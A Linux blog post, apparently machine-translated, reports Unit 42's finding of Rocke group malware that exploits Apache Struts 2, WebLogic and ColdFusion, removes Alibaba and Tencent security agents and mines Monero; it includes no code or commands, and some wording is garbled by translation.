New malware discovered. It seems that it can replace security software with a cryptodema miner.
It is common to hear the following statement: Linux has no virus And that is far from reality. It is true that Linux-based systems have a very high level of security, and for simple tasks such as installing an application, administrator permission is required.
But it is not immune to failures, much less invulnerable, as the popular saying goes.
Linux vs. Virus
Even though it is not so simple to be infected on Linux, such threats exist, and every day new cases occur. Sometimes fanciful hawks, other greens.
Security Researchers Unit 42, warn of new malware for Linux. Leader in cyber security, the Palo Alto Networks, recently discovered malware that can, through vulnerabilities in the Apache Struts 2, Oracle WebLogic and Adobe ColdFusion, inject a malicious script called a7, this script will persist using cronjobsis a software utility that automatically schedules and performs tasks on the operating system.
The mining malware
Once it has infected the server, the malware removes security software from the system. Hides your malicious process, kills any other processes that rely on iptables rules, and also undermine cryptocurrencies.
With every stage ready, he starts mining the coin Monero, which resembles Bitcoins.
Responsible for the Rocke cracker group, the software appears to be specifically looking for 5 cloud security monitoring and protection products.
Interestingly, all vulnerable security solutions are from Chinese companies:
- Alibaba Threat Detection Service agent (AI-based detection engine);
- Alibaba CloudMonitor agent (RAM Consumption Monitor, CPU, Network Connectivity);
- Alibaba Cloud Assistant agent (Software that manages instances automatically);
- Tencent Host Security agent (AI-based detection engine);
- Tencent Cloud Monitor agent (Network Connectivity Monitor and Manager);
Trend between malware
The Palo Alto Networks research team has already contacted companies that offer such solutions. It is now up to Alibaba and Tencent to address such vulnerabilities.
Seen as a possible trend among cybercriminals, researchers who have discovered such malware believe that this model will increasingly be employed by crackers.
Like most virus cases on Linux, the problem is caused by some vulnerability in other software and the way it is managed. With security updates, such possibilities are reduced and with vulnerability correction such problems are soon remedied.
And you, did you know that Linux also catches viruses? Or believed that no. Forget accessing the post link we explain everything about Linux does not catch viruses.
I'll wait for you next post, SISTAMATICALLY, here on the blog Diolinux.
_____________________________________________________________________________ See any errors or would you like to add any suggestions to this article? Collaborate, click here.